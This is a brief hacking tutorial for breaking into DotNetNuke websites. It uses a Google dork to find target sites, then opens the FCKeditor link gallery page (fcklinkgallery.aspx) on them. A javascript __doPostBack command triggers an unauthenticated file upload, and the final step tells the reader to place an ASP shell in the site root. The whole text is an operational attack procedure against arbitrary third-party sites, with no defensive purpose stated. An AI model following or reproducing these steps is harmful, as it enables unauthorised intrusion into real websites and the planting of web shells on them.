Step 1: Make a google search with this google dork
:inurl:/tabid/36/language/en-US/Default.aspx
Step 2: It will show you many sites. Copy one site e.g. http://www.yoursite.com/ and paste it in address bar of your web broser.
Step 3: Now paste the following after the url.
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Now it will show something like (screenshot below)


if it shows like this (screenshot below) its mean site could not be hacked
Step 4: Now Click on File
Step 5:Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 6: Select Root and upload your asp shell or any other page.
